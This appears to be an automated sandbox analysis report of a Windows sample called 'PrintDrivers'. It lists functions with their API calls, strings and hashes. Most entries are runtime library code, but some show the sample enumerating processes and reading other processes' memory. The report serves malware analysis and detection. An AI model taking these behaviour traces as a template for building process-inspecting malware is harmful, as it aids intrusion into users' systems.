                                                                    • GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 00583B42
                                                                    • ReadProcessMemory.KERNEL32(?,?,?,000001D8,00000000,00000000,00000018,00000000), ref: 00583B9B
                                                                    • ReadProcessMemory.KERNEL32(?,?,?,00000048,00000000,?,000001D8,00000000,00000000,00000018,00000000), ref: 00583C0E
                                                                    • ReadProcessMemory.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,?,00000048,00000000,?,000001D8,00000000,00000000), ref: 00583CAF
                                                                      • Part of subcall function 00582D40: LocalFree.KERNEL32(?,F3F544E4,?,?,005C5A40,000000FF,?,005811E2,F3F544E4,?,?,005C5A75,000000FF), ref: 00582D91
                                                                    • GetLastError.KERNEL32 ref: 00583D2C
                                                                    • FreeLibrary.KERNEL32(?), ref: 00583D6D
                                                                    Strings
                                                                    • NtQueryInformationProcess, xrefs: 00583B3C
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: MemoryProcessRead$Free$AddressDirectoryErrorLastLibraryLocalProcSystem_wcschr
                                                                    • String ID: NtQueryInformationProcess
                                                                    • API String ID: 3003745107-2781105232
                                                                    • Opcode ID: 5d363593fcb2bdccf6fb22cacfe13089b1713256e206d8008e1e5ee608ca6c25
                                                                    • Instruction ID: 8207a6828a456358ba2e497c45d9681b9ffbc5986708029349b805b905dc87ab
                                                                    • Opcode Fuzzy Hash: 5d363593fcb2bdccf6fb22cacfe13089b1713256e206d8008e1e5ee608ca6c25
                                                                    • Instruction Fuzzy Hash: DB717E709017589EDB60DF64CC4DBAEBBB4FF18704F10064AE809B7280E7B96A88CF51
                                                                    Function 0058ABA0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 151memoryCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0058ABD1
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0058ABEF
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0058AC17
                                                                    • LocalAlloc.KERNEL32(00000040,0000000C,00000000,F3F544E4,00000000,00000000,00000000), ref: 0058AC6F
                                                                    • std::_Facet_Register.LIBCPMT ref: 0058AD57
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0058AD81
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_LocalRegister
                                                                    • String ID: iw]
                                                                    • API String ID: 3931714976-3454266309
                                                                    • Opcode ID: 7e541f70319a690d385de2870fc8983bb069738f2b9c5450d3aadb2c29363a48
                                                                    • Instruction ID: 7afcf501a7f1530658ba2c99a546c5dd31cf710e99cb1a58cbbf7200018e1598
                                                                    • Opcode Fuzzy Hash: 7e541f70319a690d385de2870fc8983bb069738f2b9c5450d3aadb2c29363a48
                                                                    • Instruction Fuzzy Hash: 9751CEB0900649DFEB01DF98C884BAEBFB4FF50350F24415AE855AB381D7B4AE05CB82
                                                                    Function 0058ADA0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 128memoryCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0058ADD1
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0058ADEF
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0058AE17
                                                                    • LocalAlloc.KERNEL32(00000040,00000008,00000000,F3F544E4,00000000,00000000,00000000), ref: 0058AE6F
                                                                    • std::_Facet_Register.LIBCPMT ref: 0058AF03
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0058AF2D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_LocalRegister
                                                                    • String ID: iw]
                                                                    • API String ID: 3931714976-3454266309
                                                                    • Opcode ID: 4109a0d07c742682f49cb78f0be66b6ad299be8d3ca6975555cd278cc7597c07
                                                                    • Instruction ID: 26eae5927ab29abfb64b29b35cd7829b5b54f0199e8ee09f142babc309e7fae2
                                                                    • Opcode Fuzzy Hash: 4109a0d07c742682f49cb78f0be66b6ad299be8d3ca6975555cd278cc7597c07
                                                                    • Instruction Fuzzy Hash: E351ADB0900255DFDB15DF58C884BAEBFB8FB14710F14895EE886AB281D7B4AE45CB81
                                                                    Function 0058EF30 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 128memoryCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0058EF61
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0058EF7F
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0058EFA7
                                                                    • LocalAlloc.KERNEL32(00000040,00000008,00000000,F3F544E4,00000003,00000000), ref: 0058EFFF
                                                                    • std::_Facet_Register.LIBCPMT ref: 0058F093
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0058F0BD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_LocalRegister
                                                                    • String ID: iw]
                                                                    • API String ID: 3931714976-3454266309
                                                                    • Opcode ID: cc50ea3c00ab19484980d0144f1bb22f54c1ab8d254e620cce25396b73fde4d1
                                                                    • Instruction ID: 0355445ae2d824e3473a4108aa6af936b101da9cd377ffb16ac22cdce6568aaf
                                                                    • Opcode Fuzzy Hash: cc50ea3c00ab19484980d0144f1bb22f54c1ab8d254e620cce25396b73fde4d1
                                                                    • Instruction Fuzzy Hash: F451BB71900259DFDB11DF98C889B9EBFB4FB18310F24416DE846AB282D7B1AE45CB81
                                                                    Function 005843F0 Relevance: 12.2, APIs: 8, Instructions: 240timememoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LocalAlloc.KERNEL32(00000040,00000025,F3F544E4,?,?,00000000,?,F3F544E4,00000000,?,00000000,000000FF,?,00583922,?,?), ref: 00584494
                                                                    • LocalFree.KERNEL32(?,?,?,F3F544E4,?,?,00000000,?,F3F544E4,00000000,?), ref: 0058454E
                                                                    • OpenProcess.KERNEL32(00000400,00000000,?,F3F544E4,?,?,00000002), ref: 00584612
                                                                    • OpenProcess.KERNEL32(00000400,00000000,?,?,F3F544E4,?,?,00000002), ref: 00584633
                                                                    • GetProcessTimes.KERNEL32(00000000,00000002,00000000,00000000,00000000,?,F3F544E4,?,?,00000002), ref: 00584666
                                                                    • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,F3F544E4,?,?,00000002), ref: 00584677
                                                                    • CloseHandle.KERNEL32(00000000,?,F3F544E4,?,?,00000002), ref: 00584695
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: Process$LocalOpenTimes$AllocCloseFreeHandle
                                                                    • String ID:
                                                                    • API String ID: 657357025-0
                                                                    • Opcode ID: 5f14efd3e5ab56f80d30f4fac4511b0286eed26fc2e29b220636f09594a09982
                                                                    • Instruction ID: bc952733ca836f8ee364f024d326bb5bb5b527a5a67fc1f363079fe7e35086c6
                                                                    • Opcode Fuzzy Hash: 5f14efd3e5ab56f80d30f4fac4511b0286eed26fc2e29b220636f09594a09982
                                                                    • Instruction Fuzzy Hash: A6818E71A006169FDB14DF98C885BAEBBB5FB49710F24422AED25F7390D730AA05CF90
                                                                    Function 005A44FB Relevance: 10.7, APIs: 7, Instructions: 222COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetCPInfo.KERNEL32(?,?), ref: 005A4586
                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 005A4614
                                                                    • __alloca_probe_16.LIBCMT ref: 005A463E
                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 005A4686
                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 005A46A0
                                                                    • __alloca_probe_16.LIBCMT ref: 005A46C6
                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 005A4703
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$__alloca_probe_16$Info
                                                                    • String ID:
                                                                    • API String ID: 2298828789-0
                                                                    • Opcode ID: 403eb96b5e428f9e333826f8534e49348bf75d3821210936325c3d0037b5f1a1
                                                                    • Instruction ID: e55fa05156f9aed6e5c9519688a500fb7af1f089c081393886bf7d319c3adc82
                                                                    • Opcode Fuzzy Hash: 403eb96b5e428f9e333826f8534e49348bf75d3821210936325c3d0037b5f1a1
                                                                    • Instruction Fuzzy Hash: F9716A72D0029AAFDF219EE4C845AEEBFB5FF8B710F294115E904A7191D7A18805CFA0
                                                                    Function 00583710 Relevance: 10.7, APIs: 7, Instructions: 216processCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,F3F544E4,?), ref: 00583776
                                                                    • CloseHandle.KERNEL32(00000000), ref: 005837B6
                                                                    • Process32FirstW.KERNEL32(?,00000000), ref: 0058380A
                                                                    • OpenProcess.KERNEL32(00000410,00000000,?), ref: 0058382A
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00583935
                                                                    • Process32NextW.KERNEL32(?,00000000), ref: 00583949
                                                                    • CloseHandle.KERNEL32(?), ref: 00583997
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: CloseHandle$Process32$CreateFirstNextOpenProcessSnapshotToolhelp32
                                                                    • String ID:
                                                                    • API String ID: 708755948-0
                                                                    • Opcode ID: 70ca775b4824651b8b8f361b6673b47ce9aa0e24fba88658b9d97fb99ea55bdb
                                                                    • Instruction ID: 8efeeabebe31f1cd7493d89c7c94df21a53fc7bb6880943f362f20a1394bd2b1
                                                                    • Opcode Fuzzy Hash: 70ca775b4824651b8b8f361b6673b47ce9aa0e24fba88658b9d97fb99ea55bdb
                                                                    • Instruction Fuzzy Hash: CC91FAB1901259DFDF10DFA8D948BEEBFF8BF48704F14815AE815AB245D7B45A08CBA0
                                                                    Function 00588D30 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 166COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • std::locale::_Init.LIBCPMT ref: 00588D63
                                                                      • Part of subcall function 00594280: __EH_prolog3.LIBCMT ref: 00594287
                                                                      • Part of subcall function 00594280: std::_Lockit::_Lockit.LIBCPMT ref: 00594292
                                                                      • Part of subcall function 00594280: std::locale::_Setgloballocale.LIBCPMT ref: 005942AD
                                                                      • Part of subcall function 00594280: std::_Lockit::~_Lockit.LIBCPMT ref: 00594303
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00588D8A
                                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00588DF0
                                                                    • std::locale::_Locimp::_Makeloc.LIBCPMT ref: 00588E4A
                                                                      • Part of subcall function 00592C98: __EH_prolog3.LIBCMT ref: 00592C9F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockitstd::locale::_$H_prolog3Lockit::_$InitLocimp::_Locinfo::_Locinfo_ctorLockit::~_MakelocSetgloballocale
                                                                    • String ID: bad locale name$lw]
                                                                    • API String ID: 2464432770-4276613596
                                                                    • Opcode ID: 1e9c9d751c19ba0dd16ccd56d282868281b7385580510499865e346ca8aa763d
                                                                    • Instruction ID: 0237bd479b09e477856abe26063d519185a4dd1a3a32dc75428903b2d8a8c598
                                                                    • Opcode Fuzzy Hash: 1e9c9d751c19ba0dd16ccd56d282868281b7385580510499865e346ca8aa763d
                                                                    • Instruction Fuzzy Hash: 02518070D05289DEDB11DFA4C9897AEBFB8FF15304F584099D844AB282DB759E04C7A1
                                                                    Function 005A5DC0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 122COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _ValidateLocalCookies.LIBCMT ref: 005A5DF7
                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 005A5DFF
                                                                    • _ValidateLocalCookies.LIBCMT ref: 005A5E88
                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 005A5EB3
                                                                    • _ValidateLocalCookies.LIBCMT ref: 005A5F08
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                    • String ID: csm
                                                                    • API String ID: 1170836740-1018135373
                                                                    • Opcode ID: 1a6c894bd9d539def4703111703b8dc0b3619c5deddde564099488a9f2fe91de
                                                                    • Instruction ID: 15415244ad3698b03ce1b8edd1bf781015d000cfd6f635149cf99e6384f60cc1
                                                                    • Opcode Fuzzy Hash: 1a6c894bd9d539def4703111703b8dc0b3619c5deddde564099488a9f2fe91de
                                                                    • Instruction Fuzzy Hash: ED417F34A006099FCF10DF68C889E9EBFB9BF46314F148196E9159B392E731AE15CB91
                                                                    Function 005B8003 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: api-ms-$ext-ms-
                                                                    • API String ID: 0-537541572
                                                                    • Opcode ID: 8c33d5cd1d29f01866dd844a9382ad40d6eaae4af39f1403cbc01284b585fd37
                                                                    • Instruction ID: ea9a4293970bebc6429ff05467502e6a66f54eb4e51ae2dcfff03d725877e14b
                                                                    • Opcode Fuzzy Hash: 8c33d5cd1d29f01866dd844a9382ad40d6eaae4af39f1403cbc01284b585fd37
                                                                    • Instruction Fuzzy Hash: 2821D835A01629ABCB316A249C4DEBA7F5CBF117E0F291610ED15B7291DE30FC08D5E0
                                                                    Function 00586CF0 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 77COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,?,00000000,80004005,00000008), ref: 00586CF7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast
                                                                    • String ID: > returned:$Call to ShellExecute() for verb<$Last error=$Tv]$Tv]$Tv]
                                                                    • API String ID: 1452528299-2090863832
                                                                    • Opcode ID: b343ff8fe23e83ccc406b32bc824ed3d601718f6685b088b99b1586eb13692d6
                                                                    • Instruction ID: 5bcd73d1710570c6abbde9851edbadbb70231ae841f5db847fc44b394f46e6e7
                                                                    • Opcode Fuzzy Hash: b343ff8fe23e83ccc406b32bc824ed3d601718f6685b088b99b1586eb13692d6
                                                                    • Instruction Fuzzy Hash: C4218159B2026287CB742F7C8405339AAE0FF58715F25186FDCC9E7391F66A8C81C395
                                                                    Function 005BDC59 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 005BD9A5: _free.LIBCMT ref: 005BD9CA
                                                                    • _free.LIBCMT ref: 005BDCA7
                                                                      • Part of subcall function 005B6238: HeapFree.KERNEL32(00000000,00000000,?,005BD9CF,?,00000000,?,?,?,005BDC72,?,00000007,?,?,005BE165,?), ref: 005B624E
                                                                      • Part of subcall function 005B6238: GetLastError.KERNEL32(?,?,005BD9CF,?,00000000,?,?,?,005BDC72,?,00000007,?,?,005BE165,?,?), ref: 005B6260
                                                                    • _free.LIBCMT ref: 005BDCB2
                                                                    • _free.LIBCMT ref: 005BDCBD
                                                                    • _free.LIBCMT ref: 005BDD11
                                                                    • _free.LIBCMT ref: 005BDD1C
                                                                    • _free.LIBCMT ref: 005BDD27
                                                                    • _free.LIBCMT ref: 005BDD32
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: 8b5d52fa90c217f8a7e0d971fbc3711a7d28f3fb65ca9d77dc555dd68bb7ae36
                                                                    • Instruction ID: 86c9f302be18d3e88a3ce097180a55ef6ccabd96666632de67da76aa72ba64dd
                                                                    • Opcode Fuzzy Hash: 8b5d52fa90c217f8a7e0d971fbc3711a7d28f3fb65ca9d77dc555dd68bb7ae36
                                                                    • Instruction Fuzzy Hash: 24111F72641B09BAE660B7B0CC0FFCBBFAC7F95700F404915B2996A052EB7DB5054A61
                                                                    Function 00595607 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: Maklocstr$Maklocchr
                                                                    • String ID: iw]
                                                                    • API String ID: 2020259771-3454266309
                                                                    • Opcode ID: 37e453c48d938eb93d62696751aa8c85eebb60ffd48f2b3f62bd5a732e068ef2
                                                                    • Instruction ID: e483d2d35a65782c5c936353931da672c6307a562cdd4998a8bb9a3c315de75d
                                                                    • Opcode Fuzzy Hash: 37e453c48d938eb93d62696751aa8c85eebb60ffd48f2b3f62bd5a732e068ef2
                                                                    • Instruction Fuzzy Hash: 33118FB1A00B45BFEB219BA5D845F12BBECFB44710F14091AF245CB641E274F96487A5
                                                                    Function 005A4AD9 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • EnterCriticalSection.KERNEL32(005E0D24,?,?,00582527,005E1620,005C87A0), ref: 005A4AE3
                                                                    • LeaveCriticalSection.KERNEL32(005E0D24,?,?,00582527,005E1620,005C87A0), ref: 005A4B16
                                                                    • RtlWakeAllConditionVariable.NTDLL ref: 005A4B8D
                                                                    • SetEvent.KERNEL32(?,00582527,005E1620,005C87A0), ref: 005A4B97
                                                                    • ResetEvent.KERNEL32(?,00582527,005E1620,005C87A0), ref: 005A4BA3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalEventSection$ConditionEnterLeaveResetVariableWake
                                                                    • String ID: $^
                                                                    • API String ID: 3916383385-4185404816
                                                                    • Opcode ID: f1f519ee4c231b5cd6f1ddaebbdfb562f23ca95afc8e94d6c40c6b6de5fbbf7d
                                                                    • Instruction ID: 51d196608d17b7c634f99a0a45dd08f1b42a538e864d316f7e94ce58dd254e3d
                                                                    • Opcode Fuzzy Hash: f1f519ee4c231b5cd6f1ddaebbdfb562f23ca95afc8e94d6c40c6b6de5fbbf7d
                                                                    • Instruction Fuzzy Hash: F801A931502668EFCB199F98FC4CE983BA4FB19300704506AE8428B371CBB06C48EB90
                                                                    Function 0059B1C6 Relevance: 9.4, APIs: 6, Instructions: 449COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 0059B1CD
                                                                    • ctype.LIBCPMT ref: 0059B214
                                                                      • Part of subcall function 0059AD34: __Getctype.LIBCPMT ref: 0059AD43
                                                                      • Part of subcall function 005960D4: __EH_prolog3.LIBCMT ref: 005960DB
                                                                      • Part of subcall function 005960D4: std::_Lockit::_Lockit.LIBCPMT ref: 005960E5
                                                                      • Part of subcall function 005960D4: std::_Lockit::~_Lockit.LIBCPMT ref: 00596156
                                                                      • Part of subcall function 00592AF7: __EH_prolog3.LIBCMT ref: 00592AFE
                                                                      • Part of subcall function 00592AF7: std::_Lockit::_Lockit.LIBCPMT ref: 00592B08
                                                                      • Part of subcall function 00592AF7: std::_Lockit::~_Lockit.LIBCPMT ref: 00592BAC
                                                                      • Part of subcall function 005961FE: __EH_prolog3.LIBCMT ref: 00596205
                                                                      • Part of subcall function 005961FE: std::_Lockit::_Lockit.LIBCPMT ref: 0059620F
                                                                      • Part of subcall function 005961FE: std::_Lockit::~_Lockit.LIBCPMT ref: 00596280
                                                                      • Part of subcall function 00592AF7: Concurrency::cancel_current_task.LIBCPMT ref: 00592BB7
